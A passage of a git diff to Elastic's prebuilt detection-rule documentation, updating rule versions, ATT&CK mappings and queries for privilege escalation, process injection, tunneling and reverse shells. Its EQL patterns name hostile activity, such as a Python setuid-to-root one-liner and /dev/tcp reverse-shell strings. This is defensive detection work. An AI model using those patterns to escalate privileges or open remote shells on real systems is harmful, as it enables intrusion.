Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Time Providers +** ID: T1547.003 +** Reference URL: https://attack.mitre.org/techniques/T1547/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc index b40670d77c..bb494539a7 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc @@ -33,7 +33,7 @@ Identifies port monitor and print processor registry modifications. Adversaries * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -73,6 +73,10 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Port Monitors ** ID: T1547.010 ** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ * Tactic: ** Name: Persistence ** ID: TA0003 @@ -85,3 +89,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Port Monitors ** ID: T1547.010 ** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc index 8821bd5f3b..e80d946606 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the usage of Docker runtime sockets to escalate privilege * Domain: Container * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc index a08c0d6204..0e62b862a2 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc @@ -33,7 +33,7 @@ This rule monitors for the execution of processes that interact with Linux conta * Domain: Container * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc index 40d29f3ec4..1b3a5411e9 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc @@ -32,7 +32,7 @@ This rule detects potential privilege escalation attempts through Looney Tunable * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -41,28 +41,6 @@ This rule detects potential privilege escalation attempts through Looney Tunable *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -## Setup -Elastic Defend integration does not collect environment variable logging by default. -In order to capture this behavior, this rule requires a specific configuration option set within the advanced settings -of the Elastic Defend integration. -To set up environment variable capture for an Elastic Agent policy: -- Go to Security → Manage → Policies. -- Select an Elastic Agent policy. -- Click Show advanced settings. -- Scroll down or search for linux.advanced.capture_env_vars. -- Enter the names of env vars you want to capture, separated by commas. -- For this rule the linux.advanced.capture_env_vars variable should be set to "GLIBC_TUNABLES". -- Click Save. -After saving the integration change, the Elastic Agents running this policy will be updated and -the rule will function properly. -For more information on capturing environment variables refer - https://www.elastic.co/guide/en/security/current/environment-variable-capture.html ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc index 7a97fd8ae0..96893c8c42 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc @@ -7,9 +7,7 @@ Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) defaul *Rule indices*: -* winlogbeat-* * logs-endpoint.events.* -* logs-windows.* *Severity*: high @@ -35,7 +33,7 @@ Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) defaul * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -110,17 +108,22 @@ This rule detects the default execution of the PoC, which overwrites the `elevat [source, js] ---------------------------------- -/* This rule is compatible with both Sysmon and Elastic Endpoint */ - process where host.os.type == "windows" and event.type == "start" and - (?process.Ext.token.integrity_level_name : "System" or - ?winlog.event_data.IntegrityLevel : "System") and + process.Ext.token.integrity_level_name : "System" and ( (process.name : "elevation_service.exe" and not process.pe.original_file_name == "elevation_service.exe") or + + (process.name : "elevation_service.exe" and + not process.code_signature.trusted == true) or (process.parent.name : "elevation_service.exe" and process.name : ("rundll32.exe", "cmd.exe", "powershell.exe")) + ) and + not + ( + process.name : "elevation_service.exe" and process.code_signature.trusted == true and + process.pe.original_file_name == null ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc index 174b60991d..59057344ed 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc @@ -33,7 +33,7 @@ Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc index 989681a3e8..113090637c 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc @@ -35,7 +35,7 @@ Identifies an attempt to exploit a local privilege escalation in polkit pkexec ( * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc new file mode 100644 index 0000000000..10519d6ed0 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc @@ -0,0 +1,71 @@ +[[potential-privilege-escalation-via-python-cap-setuid]] +=== Potential Privilege Escalation via Python cap_setuid + +This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args : "import os;os.set?id(0);os.system(*)" and process.args : "*python*" and user.id != "0"] + [process where host.os.type == "linux" and event.action in ("uid_change", "gid_change") and event.type == "change" and + (user.id == "0" or group.id == "0")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc index 569c9159c7..4ec142de40 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc @@ -30,7 +30,7 @@ This rule monitors a sequence involving a program compilation event followed by * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc index 024df7dbbf..2b4374bf9b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc @@ -33,7 +33,7 @@ This rule monitors for the execution of the systemd-run command by a user with a * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc index b9ce1008b7..5afe2bac41 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc @@ -40,7 +40,7 @@ Identifies a suspicious computer account name rename event, which may indicate a * Data Source: Active Directory * Use Case: Vulnerability -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -75,6 +75,10 @@ iam where event.action == "renamed-user-account" and ** ID: TA0004 ** Reference URL: https://attack.mitre.org/tactics/TA0004/ * Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc new file mode 100644 index 0000000000..b47f984824 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc @@ -0,0 +1,93 @@ +[[potential-process-injection-from-malicious-document]] +=== Potential Process Injection from Malicious Document + +Identifies child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel) with unusual process arguments and path. This behavior is often observed during exploitation of Office applications or from documents with malicious macros. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Tactic: Initial Access +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + process.parent.name : ("excel.exe", "powerpnt.exe", "winword.exe") and + process.args_count == 1 and + process.executable : ( + "?:\\Windows\\SysWOW64\\*.exe", "?:\\Windows\\system32\\*.exe" + ) and + not (process.executable : "?:\\Windows\\System32\\spool\\drivers\\x64\\*" and + process.code_signature.trusted == true and not process.code_signature.subject_name : "Microsoft *") and + not process.executable : ( + "?:\\Windows\\Sys*\\Taskmgr.exe", + "?:\\Windows\\Sys*\\ctfmon.exe", + "?:\\Windows\\System32\\notepad.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc index 2a6f307c34..47ee70ae2a 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc @@ -33,10 +33,11 @@ Detects the use of Windows API functions that are commonly abused by malware and * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -124,3 +125,19 @@ event.category:process and host.os.type:windows and ** Name: Portable Executable Injection ** ID: T1055.002 ** Reference URL: https://attack.mitre.org/techniques/T1055/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc index c2b168c285..6e34e734ff 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc @@ -32,7 +32,7 @@ This rule monitors for common command line flags leveraged by the Chisel client * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc index 7459f5b794..cf2f7c0274 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc @@ -32,7 +32,7 @@ This rule monitors for common command line flags leveraged by the Chisel server * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc index 127a4da297..1ccf11064e 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc @@ -35,7 +35,7 @@ Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel netwo * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -44,47 +44,6 @@ Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel netwo *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc index 1018052ead..1f46761295 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc @@ -30,7 +30,7 @@ This rule leverages auditd to monitor for processes scanning different processes * Use Case: Threat Detection * Tactic: Discovery -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -39,32 +39,6 @@ This rule leverages auditd to monitor for processes scanning different processes *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Auditd Manager Integration Setup -The Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel. -Auditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. - -#### The following steps should be executed in order to add the Elastic Agent System integration "auditd_manager" on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Auditd Manager and select the integration to see more details about it. -- Click Add Auditd Manager. -- Configure the integration name and optionally add a description. -- Review optional and advanced settings accordingly. -- Add the newly installed `auditd manager` to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. -- Click Save and Continue. -- For more details on the integeration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager). - -#### Rule Specific Setup Note -Auditd Manager subscribes to the kernel and receives events as they occur without any additional configuration. -However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. -- For this detection rule the following additional audit rules are required to be added to the integration: - -- "-w /proc/ -p r -k audit_proc" ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc index 5d170dad0d..e38ef0965d 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc @@ -37,7 +37,7 @@ Identifies suspicious commands executed via a web server, which may suggest a vu * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -104,6 +104,7 @@ This rule detects a web server process spawning script and command line interfac - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -123,7 +124,7 @@ event.action in ("exec", "exec_event") and process.parent.executable : ( "/usr/local/lsws/bin/lswsctrl", "*/bin/catalina.sh" ) and -process.name : ("*sh", "python*", "perl", "php*", "tmux") and +process.name : ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "perl", "php*", "tmux") and process.args : ("whoami", "id", "uname", "cat", "hostname", "ip", "curl", "wget", "pwd") and not process.name == "phpquery" diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc index b00e3b403f..990389de90 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc @@ -36,7 +36,7 @@ Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -87,3 +87,7 @@ any where host.os.type == "windows" and ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc index e490498110..39fc5a421b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc @@ -32,11 +32,12 @@ Identifies potential use of an SSH utility to establish RDP over a reverse SSH T * OS: Windows * Use Case: Threat Detection * Tactic: Command and Control +* Tactic: Lateral Movement * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -107,3 +108,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Protocol Tunneling ** ID: T1572 ** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc new file mode 100644 index 0000000000..bf13cebed9 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc @@ -0,0 +1,107 @@ +[[potential-remote-file-execution-via-msiexec]] +=== Potential Remote File Execution via MSIEXEC + +Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [process where host.os.type == "windows" and event.action == "start" and + process.name : "msiexec.exe" and process.args : "/V"] by process.entity_id + [network where host.os.type == "windows" and process.name : "msiexec.exe" and + event.action == "connection_attempted"] by process.entity_id + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : "msiexec.exe" and user.id : ("S-1-5-21-*", "S-1-5-12-1-*") and + not process.executable : ("?:\\Windows\\SysWOW64\\msiexec.exe", + "?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\System32\\srtasks.exe", + "?:\\Windows\\SysWOW64\\srtasks.exe", + "?:\\Windows\\System32\\taskkill.exe", + "?:\\Windows\\Installer\\MSI*.tmp", + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\ie4uinit.exe", + "?:\\Windows\\SysWOW64\\ie4uinit.exe", + "?:\\Windows\\System32\\sc.exe", + "?:\\Windows\\system32\\Wbem\\mofcomp.exe", + "?:\\Windows\\twain_32\\fjscan32\\SOP\\crtdmprc.exe", + "?:\\Windows\\SysWOW64\\taskkill.exe", + "?:\\Windows\\SysWOW64\\schtasks.exe", + "?:\\Windows\\system32\\schtasks.exe", + "?:\\Windows\\System32\\sdbinst.exe") and + not (process.code_signature.subject_name == "Citrix Systems, Inc." and process.code_signature.trusted == true) and + not (process.name : ("regsvr32.exe", "powershell.exe", "rundll32.exe", "wscript.exe") and + process.Ext.token.integrity_level_name == "high" and + process.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")) and + not (process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") and process.code_signature.trusted == true) and + not (process.name : "rundll32.exe" and process.args : "printui.dll,PrintUIEntry") + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc index a3daf552e3..d74b58e508 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc @@ -36,7 +36,7 @@ Identifies the execution of a shell process with suspicious arguments which may * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -94,7 +94,9 @@ process where event.type in ("start", "process_started") and /* noisy FPs */ not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and - not process.command_line : ("*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", 